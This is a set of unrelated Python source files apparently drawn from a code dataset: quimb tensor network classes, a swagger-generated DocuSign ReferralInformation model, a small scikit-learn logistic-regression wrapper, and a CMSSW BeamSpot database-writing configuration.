return tuple(map(self.lower_ind, self.gen_site_coos()))
def rand_state(self, bond_dim, **mps_opts):
"""Get a random vector matching this MPO.
"""
return qu.tensor.MPS_rand_state(
self.L, bond_dim=bond_dim,
phys_dim=[self.phys_dim(i) for i in self.sites],
dtype=self.dtype, cyclic=self.cyclic, **mps_opts
)
def identity(self, **mpo_opts):
"""Get a identity matching this MPO.
"""
return qu.tensor.MPO_identity_like(self, **mpo_opts)
def show(self, max_width=None):
l1 = ""
l2 = ""
l3 = ""
num_can_l, num_can_r = self.count_canonized()
for i in range(self.L - 1):
bdim = self.bond_size(i, i + 1)
strl = len(str(bdim))
l1 += f"│{bdim}"
l2 += (">" if i < num_can_l else
"<" if i >= self.L - num_can_r else
"●") + ("─" if bdim < 100 else "━") * strl
l3 += "│" + " " * strl
l1 += "│"
l2 += "<" if num_can_r > 0 else "●"
l3 += "│"
if self.cyclic:
bdim = self.bond_size(0, self.L - 1)
bnd_str = ("─" if bdim < 100 else "━") * strl
l1 = f" {bdim}{l1}{bdim} "
l2 = f"+{bnd_str}{l2}{bnd_str}+"
l3 = f" {' ' * strl}{l3}{' ' * strl} "
print_multi_line(l1, l2, l3, max_width=max_width)
class Dense1D(TensorNetwork1DVector,
TensorNetwork1D,
TensorNetwork):
"""Mimics other 1D tensor network structures, but really just keeps the
    full state in a single tensor. This allows e.g. applying gates in the same
    way for quantum circuit simulation as for lazily represented Hilbert
    spaces.
Parameters
----------
array : array_like
        The full Hilbert space vector - assumed to be made of equal Hilbert
spaces each of size ``phys_dim`` and will be reshaped as such.
phys_dim : int, optional
        The Hilbert space size of each site, default: 2.
tags : sequence of str, optional
Extra tags to add to the tensor network.
site_ind_id : str, optional
String formatter describing how to label the site indices.
site_tag_id : str, optional
String formatter describing how to label the site tags.
tn_opts
Supplied to :class:`~quimb.tensor.tensor_core.TensorNetwork`.
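    Examples
    --------
    A minimal sketch, wrapping a random dense ket generated with
    ``qu.rand_ket`` (illustrative only)::
        psi = Dense1D(qu.rand_ket(2**6))
        psi.L  # 6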
"""
_EXTRA_PROPS = (
'_site_ind_id',
'_site_tag_id',
'_L',
)
def __init__(self, array, phys_dim=2, tags=None,
site_ind_id='k{}', site_tag_id='I{}', **tn_opts):
# copy short-circuit
if isinstance(array, Dense1D):
super().__init__(array)
return
# work out number of sites and sub-dimensions etc.
self._L = qu.infer_size(array, base=phys_dim)
dims = [phys_dim] * self.L
data = ops.asarray(array).reshape(*dims)
# process site indices
self._site_ind_id = site_ind_id
site_inds = [self.site_ind(i) for i in range(self.L)]
# process site tags
self._site_tag_id = site_tag_id
site_tags = oset(self.site_tag(i) for i in range(self.L))
if tags is not None:
# mix in global tags
site_tags = tags_to_oset(tags) | site_tags
T = Tensor(data=data, inds=site_inds, tags=site_tags)
super().__init__([T], virtual=True, **tn_opts)
@classmethod
def rand(cls, n, phys_dim=2, dtype=float, **dense1d_opts):
"""Create a random dense vector 'tensor network'.
"""
array = qu.randn(phys_dim ** n, dtype=dtype)
array /= qu.norm(array, 'fro')
return cls(array, **dense1d_opts)
class SuperOperator1D(
TensorNetwork1D,
TensorNetwork,
):
r"""A 1D tensor network super-operator class::
0 1 2 n-1
| | | | <-- outer_upper_ind_id
O===O===O== =O
|\ |\ |\ |\ <-- inner_upper_ind_id
) ) ) ... ) <-- K (size of local Kraus sum)
|/ |/ |/ |/ <-- inner_lower_ind_id
O===O===O== =O
| | : | | <-- outer_lower_ind_id
:
chi (size of entangling bond dim)
Parameters
----------
arrays : sequence of arrays
        The data arrays defining the superoperator; this should be a sequence
        of 2n arrays, such that the first two correspond to the upper and lower
        operators acting on site 0 etc. The arrays should be 5-dimensional
        unless OBC conditions are desired, in which case the first two and last
        two should be 4-dimensional. The dimensions of each array should
match the ``shape`` option.
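    Examples
    --------
    A minimal sketch using the random constructor defined on this class
    (the parameters are illustrative only)::
        rho_op = SuperOperator1D.rand(6, K=3, chi=4)
        rho_op.L  # 6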
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_outer_upper_ind_id',
'_inner_upper_ind_id',
'_inner_lower_ind_id',
'_outer_lower_ind_id',
'cyclic',
'_L',
)
def __init__(
self, arrays,
shape='lrkud',
site_tag_id='I{}',
outer_upper_ind_id='kn{}',
inner_upper_ind_id='k{}',
inner_lower_ind_id='b{}',
outer_lower_ind_id='bn{}',
tags=None,
tags_upper=None,
tags_lower=None,
**tn_opts,
):
# short-circuit for copying
if isinstance(arrays, SuperOperator1D):
super().__init__(arrays)
return
arrays = tuple(arrays)
self._L = len(arrays) // 2
# process indices
self._outer_upper_ind_id = outer_upper_ind_id
self._inner_upper_ind_id = inner_upper_ind_id
self._inner_lower_ind_id = inner_lower_ind_id
self._outer_lower_ind_id = outer_lower_ind_id
outer_upper_inds = map(outer_upper_ind_id.format, self.gen_site_coos())
inner_upper_inds = map(inner_upper_ind_id.format, self.gen_site_coos())
inner_lower_inds = map(inner_lower_ind_id.format, self.gen_site_coos())
outer_lower_inds = map(outer_lower_ind_id.format, self.gen_site_coos())
# process tags
self._site_tag_id = site_tag_id
tags = tags_to_oset(tags)
tags_upper = tags_to_oset(tags_upper)
tags_lower = tags_to_oset(tags_lower)
def gen_tags():
for site_tag in self.site_tags:
yield (site_tag,) + tags + tags_upper
yield (site_tag,) + tags + tags_lower
self.cyclic = (ops.ndim(arrays[0]) == 5)
# transpose arrays to 'lrkud' order
# u
# |
# l--O--r
# |\
# d k
def gen_orders():
lkud_ord = tuple(shape.replace('r', "").find(x) for x in 'lkud')
rkud_ord = tuple(shape.replace('l', "").find(x) for x in 'rkud')
lrkud_ord = tuple(map(shape.find, 'lrkud'))
yield rkud_ord if not self.cyclic else lrkud_ord
yield rkud_ord if not self.cyclic else lrkud_ord
for _ in range(self.L - 2):
yield lrkud_ord
yield lrkud_ord
yield lkud_ord if not self.cyclic else lrkud_ord
yield lkud_ord if not self.cyclic else lrkud_ord
def gen_inds():
# |<- outer_upper_ind
# cycU_ix or pU_ix --O-- nU_ix
# /|<- inner_upper_ind
# k_ix ->(
# \|<- inner_lower_ind
# cycL_ix or pL_ix --O-- nL_ix
# |<- outer_lower_ind
if self.cyclic:
cycU_ix, cycL_ix = (rand_uuid(),), (rand_uuid(),)
else:
cycU_ix, cycL_ix = (), ()
nU_ix, nL_ix, k_ix = rand_uuid(), rand_uuid(), rand_uuid()
yield (*cycU_ix, nU_ix, k_ix,
next(outer_upper_inds), next(inner_upper_inds))
yield (*cycL_ix, nL_ix, k_ix,
next(outer_lower_inds), next(inner_lower_inds))
pU_ix, pL_ix = nU_ix, nL_ix
for _ in range(self.L - 2):
nU_ix, nL_ix, k_ix = rand_uuid(), rand_uuid(), rand_uuid()
yield (pU_ix, nU_ix, k_ix,
next(outer_upper_inds), next(inner_upper_inds))
yield (pL_ix, nL_ix, k_ix,
next(outer_lower_inds), next(inner_lower_inds))
pU_ix, pL_ix = nU_ix, nL_ix
k_ix = rand_uuid()
yield (pU_ix, *cycU_ix, k_ix,
next(outer_upper_inds), next(inner_upper_inds))
yield (pL_ix, *cycL_ix, k_ix,
next(outer_lower_inds), next(inner_lower_inds))
def gen_tensors():
for array, tags, inds, order in zip(arrays, gen_tags(),
gen_inds(), gen_orders()):
yield Tensor(transpose(array, order), inds=inds, tags=tags)
super().__init__(gen_tensors(), virtual=True, **tn_opts)
@classmethod
def rand(cls, n, K, chi, phys_dim=2, herm=True,
cyclic=False, dtype=complex, **superop_opts):
def gen_arrays():
for i in range(n):
shape = []
if cyclic or (i != 0):
shape += [chi]
if cyclic or (i != n - 1):
shape += [chi]
shape += [K, phys_dim, phys_dim]
data = qu.randn(shape=shape, dtype=dtype)
yield data
if herm:
yield data.conj()
else:
yield qu.randn(shape=shape, dtype=dtype)
arrays = map(ops.sensibly_scale, gen_arrays())
return cls(arrays, **superop_opts)
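    # Minimal usage sketch (illustrative only): build a random superoperator
    # with 6 sites, Kraus dimension K=3 and bond dimension chi=4, then inspect
    # the default index naming set up in ``__init__``:
    #
    #     sop = SuperOperator1D.rand(6, K=3, chi=4, phys_dim=2, cyclic=False)
    #     sop.L                       # -> 6
    #     sop.outer_upper_ind_id      # -> 'kn{}'
    #     sop.inner_lower_ind_id      # -> 'b{}'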
@property
def outer_upper_ind_id(self):
return self._outer_upper_ind_id
@property
def inner_upper_ind_id(self):
return self._inner_upper_ind_id
@property
def inner_lower_ind_id(self):
return self._inner_lower_ind_id
@property
def outer_lower_ind_id(self):
return self._outer_lower_ind_id
class TNLinearOperator1D(spla.LinearOperator):
r"""A 1D tensor network linear operator like::
start stop - 1
. .
:-O-O-O-O-O-O-O-O-O-O-O-O-: --+
: | | | | | | | | | | | | : |
:-H-H-H-H-H-H-H-H-H-H-H-H-: acting on --V
: | | | | | | | | | | | | : |
:-O-O-O-O-O-O-O-O-O-O-O-O-: --+
left_inds^ ^right_inds
    Like :class:`~quimb.tensor.tensor_core.TNLinearOperator`, but performs a
    structured contract from one end to the other that can handle very long
    chains, possibly more efficiently, by contracting in blocks from one end.
Parameters
----------
tn : TensorNetwork
The tensor network to turn into a ``LinearOperator``.
    left_inds : sequence of str
        The left indices.
    right_inds : sequence of str
        The right indices.
start : int
Index of starting site.
stop : int
Index of stopping site (does not include this site).
ldims : tuple of int, optional
If known, the dimensions corresponding to ``left_inds``.
rdims : tuple of int, optional
If known, the dimensions corresponding to ``right_inds``.
See Also
--------
TNLinearOperator
"""
def __init__(self, tn, left_inds, right_inds, start, stop,
ldims=None, rdims=None, is_conj=False, is_trans=False):
self.tn = tn
self.start, self.stop = start, stop
if ldims is None or rdims is None:
ind_sizes = tn.ind_sizes()
ldims = tuple(ind_sizes[i] for i in left_inds)
rdims = tuple(ind_sizes[i] for i in right_inds)
self.left_inds, self.right_inds = left_inds, right_inds
self.ldims, ld = ldims, qu.prod(ldims)
self.rdims, rd = rdims, qu.prod(rdims)
self.tags = self.tn.tags
        # conjugate inputs/outputs rather than all tensors if necessary
self.is_conj = is_conj
self.is_trans = is_trans
self._conj_linop = None
self._adjoint_linop = None
self._transpose_linop = None
super().__init__(dtype=self.tn.dtype, shape=(ld, rd))
def _matvec(self, vec):
in_data = reshape(vec, self.rdims)
if self.is_conj:
in_data = conj(in_data)
if self.is_trans:
i, f, s = self.start, self.stop, 1
else:
i, f, s = self.stop - 1, self.start - 1, -1
# add the vector to the right of the chain
tnc = self.tn | Tensor(in_data, self.right_inds, tags=['_VEC'])
tnc.view_like_(self.tn)
# tnc = self.tn.copy()
# tnc |= Tensor(in_data, self.right_inds, tags=['_VEC'])
# absorb it into the rightmost site
tnc ^= ['_VEC', self.tn.site_tag(i)]
# then do a structured contract along the whole chain
out_T = tnc ^ slice(i, f, s)
out_data = out_T.transpose_(*self.left_inds).data.ravel()
if self.is_conj:
out_data = conj(out_data)
return out_data
def _matmat(self, mat):
d = mat.shape[-1]
in_data = reshape(mat, (*self.rdims, d))
if self.is_conj:
in_data = conj(in_data)
if self.is_trans:
i, f, s = self.start, self.stop, 1
else:
i, f, s = self.stop - 1, self.start - 1, -1
# add the vector to the right of the chain
in_ix = (*self.right_inds, '_mat_ix')
tnc = self.tn | Tensor(in_data, inds=in_ix, tags=['_VEC'])
tnc.view_like_(self.tn)
# tnc = self.tn.copy()
# tnc |= Tensor(in_data, inds=in_ix, tags=['_VEC'])
# absorb it into the rightmost site
tnc ^= ['_VEC', self.tn.site_tag(i)]
# then do a structured contract along the whole chain
out_T = tnc ^ slice(i, f, s)
out_ix = (*self.left_inds, '_mat_ix')
out_data = reshape(out_T.transpose_(*out_ix).data, (-1, d))
if self.is_conj:
out_data = conj(out_data)
return out_data
def copy(self, conj=False, transpose=False):
if transpose:
inds = (self.right_inds, self.left_inds)
dims = (self.rdims, self.ldims)
is_trans = not self.is_trans
else:
inds = (self.left_inds, self.right_inds)
dims = (self.ldims, self.rdims)
is_trans = self.is_trans
if conj:
is_conj = not self.is_conj
else:
is_conj = self.is_conj
return TNLinearOperator1D(self.tn, *inds, self.start, self.stop, *dims,
is_conj=is_conj, is_trans=is_trans)
def conj(self):
if self._conj_linop is None:
self._conj_linop = self.copy(conj=True)
return self._conj_linop
def _transpose(self):
if self._transpose_linop is None:
self._transpose_linop = self.copy(transpose=True)
return self._transpose_linop
def _adjoint(self):
"""Hermitian conjugate of this TNLO.
"""
# cache the adjoint
if self._adjoint_linop is None:
self._adjoint_linop = self.copy(conj=True, transpose=True)
return self._adjoint_linop
def to_dense(self):
T = self.tn ^ slice(self.start, self.stop)
if self.is_conj:
T = T.conj()
return T.to_dense(self.left_inds, self.right_inds)
@property
def A(self):
return self.to_dense()
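# Minimal usage sketch (illustrative; ``tn``, ``left_inds`` and ``right_inds``
# are placeholders for an existing 1D tensor network and its dangling indices,
# and ``eigsh`` assumes the wrapped operator is hermitian):
#
#     lo = TNLinearOperator1D(tn, left_inds, right_inds, start=0, stop=tn.L)
#     w, v = spla.eigsh(lo, k=1, which='LA')   # matrix-free largest eigenpair
#     dense = lo.to_dense()                    # or contract to a dense matrix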
|
the-stack_0_1693 | # coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign. # noqa: E501
OpenAPI spec version: v2.1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from docusign_esign.client.configuration import Configuration
class ReferralInformation(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'advertisement_id': 'str',
'enable_support': 'str',
'external_org_id': 'str',
'group_member_id': 'str',
'id_type': 'str',
'included_seats': 'str',
'industry': 'str',
'plan_start_month': 'str',
'promo_code': 'str',
'publisher_id': 'str',
'referral_code': 'str',
'referrer_name': 'str',
'sale_discount_amount': 'str',
'sale_discount_fixed_amount': 'str',
'sale_discount_percent': 'str',
'sale_discount_periods': 'str',
'sale_discount_seat_price_override': 'str',
'shopper_id': 'str'
}
attribute_map = {
'advertisement_id': 'advertisementId',
'enable_support': 'enableSupport',
'external_org_id': 'externalOrgId',
'group_member_id': 'groupMemberId',
'id_type': 'idType',
'included_seats': 'includedSeats',
'industry': 'industry',
'plan_start_month': 'planStartMonth',
'promo_code': 'promoCode',
'publisher_id': 'publisherId',
'referral_code': 'referralCode',
'referrer_name': 'referrerName',
'sale_discount_amount': 'saleDiscountAmount',
'sale_discount_fixed_amount': 'saleDiscountFixedAmount',
'sale_discount_percent': 'saleDiscountPercent',
'sale_discount_periods': 'saleDiscountPeriods',
'sale_discount_seat_price_override': 'saleDiscountSeatPriceOverride',
'shopper_id': 'shopperId'
}
def __init__(self, _configuration=None, **kwargs): # noqa: E501
"""ReferralInformation - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._advertisement_id = None
self._enable_support = None
self._external_org_id = None
self._group_member_id = None
self._id_type = None
self._included_seats = None
self._industry = None
self._plan_start_month = None
self._promo_code = None
self._publisher_id = None
self._referral_code = None
self._referrer_name = None
self._sale_discount_amount = None
self._sale_discount_fixed_amount = None
self._sale_discount_percent = None
self._sale_discount_periods = None
self._sale_discount_seat_price_override = None
self._shopper_id = None
self.discriminator = None
setattr(self, "_{}".format('advertisement_id'), kwargs.get('advertisement_id', None))
setattr(self, "_{}".format('enable_support'), kwargs.get('enable_support', None))
setattr(self, "_{}".format('external_org_id'), kwargs.get('external_org_id', None))
setattr(self, "_{}".format('group_member_id'), kwargs.get('group_member_id', None))
setattr(self, "_{}".format('id_type'), kwargs.get('id_type', None))
setattr(self, "_{}".format('included_seats'), kwargs.get('included_seats', None))
setattr(self, "_{}".format('industry'), kwargs.get('industry', None))
setattr(self, "_{}".format('plan_start_month'), kwargs.get('plan_start_month', None))
setattr(self, "_{}".format('promo_code'), kwargs.get('promo_code', None))
setattr(self, "_{}".format('publisher_id'), kwargs.get('publisher_id', None))
setattr(self, "_{}".format('referral_code'), kwargs.get('referral_code', None))
setattr(self, "_{}".format('referrer_name'), kwargs.get('referrer_name', None))
setattr(self, "_{}".format('sale_discount_amount'), kwargs.get('sale_discount_amount', None))
setattr(self, "_{}".format('sale_discount_fixed_amount'), kwargs.get('sale_discount_fixed_amount', None))
setattr(self, "_{}".format('sale_discount_percent'), kwargs.get('sale_discount_percent', None))
setattr(self, "_{}".format('sale_discount_periods'), kwargs.get('sale_discount_periods', None))
setattr(self, "_{}".format('sale_discount_seat_price_override'), kwargs.get('sale_discount_seat_price_override', None))
setattr(self, "_{}".format('shopper_id'), kwargs.get('shopper_id', None))
@property
def advertisement_id(self):
"""Gets the advertisement_id of this ReferralInformation. # noqa: E501
        A complex type that contains the following information for entering referral and discount information. The following items are included in the referral information (all string content): enableSupport, includedSeats, saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, saleDiscountSeatPriceOverride, planStartMonth, referralCode, referrerName, advertisementId, publisherId, shopperId, promoCode, groupMemberId, idType, and industry. ###### Note: saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, and saleDiscountSeatPriceOverride are reserved for DocuSign use only. # noqa: E501
:return: The advertisement_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._advertisement_id
@advertisement_id.setter
def advertisement_id(self, advertisement_id):
"""Sets the advertisement_id of this ReferralInformation.
        A complex type that contains the following information for entering referral and discount information. The following items are included in the referral information (all string content): enableSupport, includedSeats, saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, saleDiscountSeatPriceOverride, planStartMonth, referralCode, referrerName, advertisementId, publisherId, shopperId, promoCode, groupMemberId, idType, and industry. ###### Note: saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, and saleDiscountSeatPriceOverride are reserved for DocuSign use only. # noqa: E501
:param advertisement_id: The advertisement_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._advertisement_id = advertisement_id
@property
def enable_support(self):
"""Gets the enable_support of this ReferralInformation. # noqa: E501
When set to **true**, then customer support is provided as part of the account plan. # noqa: E501
:return: The enable_support of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._enable_support
@enable_support.setter
def enable_support(self, enable_support):
"""Sets the enable_support of this ReferralInformation.
When set to **true**, then customer support is provided as part of the account plan. # noqa: E501
:param enable_support: The enable_support of this ReferralInformation. # noqa: E501
:type: str
"""
self._enable_support = enable_support
@property
def external_org_id(self):
"""Gets the external_org_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The external_org_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._external_org_id
@external_org_id.setter
def external_org_id(self, external_org_id):
"""Sets the external_org_id of this ReferralInformation.
# noqa: E501
:param external_org_id: The external_org_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._external_org_id = external_org_id
@property
def group_member_id(self):
"""Gets the group_member_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The group_member_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._group_member_id
@group_member_id.setter
def group_member_id(self, group_member_id):
"""Sets the group_member_id of this ReferralInformation.
# noqa: E501
:param group_member_id: The group_member_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._group_member_id = group_member_id
@property
def id_type(self):
"""Gets the id_type of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The id_type of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._id_type
@id_type.setter
def id_type(self, id_type):
"""Sets the id_type of this ReferralInformation.
# noqa: E501
:param id_type: The id_type of this ReferralInformation. # noqa: E501
:type: str
"""
self._id_type = id_type
@property
def included_seats(self):
"""Gets the included_seats of this ReferralInformation. # noqa: E501
The number of seats (users) included. # noqa: E501
:return: The included_seats of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._included_seats
@included_seats.setter
def included_seats(self, included_seats):
"""Sets the included_seats of this ReferralInformation.
The number of seats (users) included. # noqa: E501
:param included_seats: The included_seats of this ReferralInformation. # noqa: E501
:type: str
"""
self._included_seats = included_seats
@property
def industry(self):
"""Gets the industry of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The industry of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._industry
@industry.setter
def industry(self, industry):
"""Sets the industry of this ReferralInformation.
# noqa: E501
:param industry: The industry of this ReferralInformation. # noqa: E501
:type: str
"""
self._industry = industry
@property
def plan_start_month(self):
"""Gets the plan_start_month of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The plan_start_month of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._plan_start_month
@plan_start_month.setter
def plan_start_month(self, plan_start_month):
"""Sets the plan_start_month of this ReferralInformation.
# noqa: E501
:param plan_start_month: The plan_start_month of this ReferralInformation. # noqa: E501
:type: str
"""
self._plan_start_month = plan_start_month
@property
def promo_code(self):
"""Gets the promo_code of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The promo_code of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._promo_code
@promo_code.setter
def promo_code(self, promo_code):
"""Sets the promo_code of this ReferralInformation.
# noqa: E501
:param promo_code: The promo_code of this ReferralInformation. # noqa: E501
:type: str
"""
self._promo_code = promo_code
@property
def publisher_id(self):
"""Gets the publisher_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The publisher_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._publisher_id
@publisher_id.setter
def publisher_id(self, publisher_id):
"""Sets the publisher_id of this ReferralInformation.
# noqa: E501
:param publisher_id: The publisher_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._publisher_id = publisher_id
@property
def referral_code(self):
"""Gets the referral_code of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The referral_code of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._referral_code
@referral_code.setter
def referral_code(self, referral_code):
"""Sets the referral_code of this ReferralInformation.
# noqa: E501
:param referral_code: The referral_code of this ReferralInformation. # noqa: E501
:type: str
"""
self._referral_code = referral_code
@property
def referrer_name(self):
"""Gets the referrer_name of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The referrer_name of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._referrer_name
@referrer_name.setter
def referrer_name(self, referrer_name):
"""Sets the referrer_name of this ReferralInformation.
# noqa: E501
:param referrer_name: The referrer_name of this ReferralInformation. # noqa: E501
:type: str
"""
self._referrer_name = referrer_name
@property
def sale_discount_amount(self):
"""Gets the sale_discount_amount of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_amount of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_amount
@sale_discount_amount.setter
def sale_discount_amount(self, sale_discount_amount):
"""Sets the sale_discount_amount of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_amount: The sale_discount_amount of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_amount = sale_discount_amount
@property
def sale_discount_fixed_amount(self):
"""Gets the sale_discount_fixed_amount of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_fixed_amount of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_fixed_amount
@sale_discount_fixed_amount.setter
def sale_discount_fixed_amount(self, sale_discount_fixed_amount):
"""Sets the sale_discount_fixed_amount of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_fixed_amount: The sale_discount_fixed_amount of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_fixed_amount = sale_discount_fixed_amount
@property
def sale_discount_percent(self):
"""Gets the sale_discount_percent of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_percent of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_percent
@sale_discount_percent.setter
def sale_discount_percent(self, sale_discount_percent):
"""Sets the sale_discount_percent of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_percent: The sale_discount_percent of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_percent = sale_discount_percent
@property
def sale_discount_periods(self):
"""Gets the sale_discount_periods of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_periods of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_periods
@sale_discount_periods.setter
def sale_discount_periods(self, sale_discount_periods):
"""Sets the sale_discount_periods of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_periods: The sale_discount_periods of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_periods = sale_discount_periods
@property
def sale_discount_seat_price_override(self):
"""Gets the sale_discount_seat_price_override of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_seat_price_override of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_seat_price_override
@sale_discount_seat_price_override.setter
def sale_discount_seat_price_override(self, sale_discount_seat_price_override):
"""Sets the sale_discount_seat_price_override of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_seat_price_override: The sale_discount_seat_price_override of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_seat_price_override = sale_discount_seat_price_override
@property
def shopper_id(self):
"""Gets the shopper_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The shopper_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._shopper_id
@shopper_id.setter
def shopper_id(self, shopper_id):
"""Sets the shopper_id of this ReferralInformation.
# noqa: E501
:param shopper_id: The shopper_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._shopper_id = shopper_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ReferralInformation, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReferralInformation):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ReferralInformation):
return True
return self.to_dict() != other.to_dict()
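# Minimal usage sketch (illustrative only; the field values below are made up):
#
#     info = ReferralInformation(promo_code='SPRING21', referral_code='ABC123',
#                                included_seats='5')
#     info.to_dict()   # snake_case keys; camelCase JSON names are in attribute_map
#     str(info)        # pretty-printed via to_str()/__repr__()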
|
the-stack_0_1695 | #!/usr/bin/env python
from sklearn import svm
import numpy as np
from sklearn.externals import joblib
from sklearn import linear_model
import classifier.msg as msg
import os
SINGLE = 0
MULTIPLE = 1
def ini(path=None):
'''initialization
Args:
Returns:
'''
global clf
clf = linear_model.LogisticRegression(class_weight='balanced') #LR
if path is not None:
if os.path.exists(path):
clf = joblib.load(path)
msg.timemsg('Loaded classifier from: {}'.format(path))
else:
msg.timemsg('Path to classifier does not exist: {}'.format(path))
# SVM
#clf = svm.SVC(kernel='linear', C = 1.0) # SVM
def train(features, labels, path='clf.pkl'):
'''train classifier
Args:
features (list): Features
labels (list): Labels
Returns:
'''
global clf
msg.timemsg("train_shape: {}".format(features.shape))
msg.timemsg('Start training')
clf.fit(features, labels)
msg.timemsg('Finished training')
try:
joblib.dump(clf, path)
msg.timemsg('Dumped classifier')
except:
msg.timemsg('Failed to dump classifier!')
def predict(X, mode):
'''Prediction
Args:
Returns:
prediction (list)
'''
global clf
if (mode == MULTIPLE): # many features
#msg.timemsg("predict_shape: {}".format(X.shape))
return clf.predict(X)
if (mode == SINGLE):
return np.squeeze(np.array(clf.predict(X.reshape(1,-1)))) # convert to array, one dimension too much, remove it
def save (folder):
'''Save
Args:
folder
Returns:
.pkl
'''
global clf
joblib.dump(clf, folder)
def load (folder):
'''Save
Args:
folder
Returns:
.pkl
'''
global clf
clf = joblib.load(folder)
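# Minimal usage sketch (illustrative only; the arrays below are random
# placeholders, not real features). The module holds a single global ``clf``,
# so initialise it first, then train and predict:
#
#     ini()                                   # fresh balanced LogisticRegression
#     X = np.random.rand(100, 8)              # 100 samples, 8 features
#     y = np.random.randint(0, 2, size=100)   # binary labels
#     train(X, y, path='clf.pkl')             # fits and dumps the classifier
#     batch_preds = predict(X, MULTIPLE)      # one prediction per row
#     single_pred = predict(X[0], SINGLE)     # reshaped internally to (1, -1)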
|
the-stack_0_1698 | import FWCore.ParameterSet.Config as cms
process = cms.Process("write2DB")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.load("CondCore.CondDB.CondDB_cfi")
#################################
# Produce a SQLITE FILE
process.CondDB.connect = "SQLITEFILE"
#################################
process.PoolDBOutputService = cms.Service("PoolDBOutputService",
process.CondDB,
toPut = cms.VPSet(cms.PSet(record = cms.string('BeamSpotObjectsRcd'),
tag = cms.string('TAGNAME')
)
),
timetype = cms.untracked.string('TIMETYPE'),
loadBlobStreamer = cms.untracked.bool(False)
)
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(1))
process.beamspot = cms.EDAnalyzer("BeamSpotWrite2DB",
OutputFileName = cms.untracked.string('BEAMSPOTFILE')
)
process.p = cms.Path(process.beamspot)
# done.
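# The upper-case tokens SQLITEFILE, TAGNAME, TIMETYPE and BEAMSPOTFILE above are
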